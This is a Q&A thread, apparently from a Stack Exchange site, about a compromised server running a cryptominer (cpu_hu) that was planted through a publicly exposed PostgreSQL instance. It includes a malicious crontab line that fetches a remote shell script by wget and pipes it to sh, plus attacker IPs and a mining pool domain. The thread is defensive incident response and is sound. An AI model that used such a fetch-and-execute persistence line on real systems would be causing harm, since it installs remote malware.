Possible Malware: Unable to track starting point
For past couple of days I have been observing weird processes in one of our server. Most of the time I see multiple instances of executable 10 and sometimes 4  and takes a lot of cpu resources. When examined this I have been seeing the process is started by cron right after starting a process with executable cpu_hu. Which is apparently foreign to my system and simple search did not resolve to anything.

Then examined the cpu_hu process, examined exe location then removed accordingly (location in the image points to a venv for a small project our team is working on)

even though I removed the binary, after reboot it appeared in a different location
and the executables 10, 4 started from memory (no physical executable location)

I deleted cpu_hu binary from all the locations of the system stopped the process and rebooted, but after some time cpu_hu binary appears elsewhere. For now i have stopped crond and killed the respective processes. Which seemed to have stopped the process from starting again.
At this point I am pretty sure its  malicious. How can I get rid of this or rather find the starting point of this malware to prevent it from starting.

Please don't post pictures of text

Please read How do I deal with a compromised server? over on Information Security and its original on ServerFault

(Rewritten based on OP's comments)
The cpu_hu seems to execute as user postgres, which suggests it might have been started by using a weakness in your PostgreSQL database engine or its configuration.
Maybe your PostgreSQL database is accessible from the internet and your database admin password is nonexistent or weak?
Or are you running your project as the postgres user? That's a bad idea: a vulnerability in any component used by your project (e.g. in Django) that would allow them to inject SQL commands would then give them a "local admin" access to the database engine, and allow them to steal or corrupt all the data managed by that database engine, not limited to the database(s) of your project only. Database admin access also includes the privilege to run arbitrary OS commands as the database engine user.
Otherwise, make a list of every software component used in your project and their versions, and start googling for known vulnerabilities in those versions.
Do the malware processes appear if you reboot the system without an internet connection? If they do, you have a local persistent malware hiding somewhere. If not, the infection might be non-persistent, and you might be getting reinfected by another computer as soon as your system boots up.

Hi its none of the above, thats a small project one of our team member working. I am not sure how does this vulnerability is applicable in this case!

@ChrisDavies updated accordingly

was not running the project as postgres user but found out postgres was publically accessible!!!

I found a crontab entry very suspicious under postgres user * * * * * wget -q -O - http://185.122.204.197/pg.sh | sh > /dev/null 2>&1 right now I cant download this but this might be starting the cpu_hu process

It's malware, my server was also infected, after some analysis on the cpu_hu binary it emerged that it seems to undermine something for mine.c3pool.com
(there are also credentials inside lol)
In my case they were able to run bash scripts via queries
I recommend you check for a database called "README", it has 2 tables containing some base64 encoded binaries
https://www.virustotal.com/gui/file/25103f51230e8af49b6b94b0ecad127fc2b4b623e033383c6f61e5eb4f65c6c6
They also created their own user called "pga somthing" inside the dbms
Be careful that the cpu_hu executable, in my case, was replicated in several places inside the database folder
Their ips:

64.62.156.108
192.169.177.45
167.94.145.107
172.169.205.242

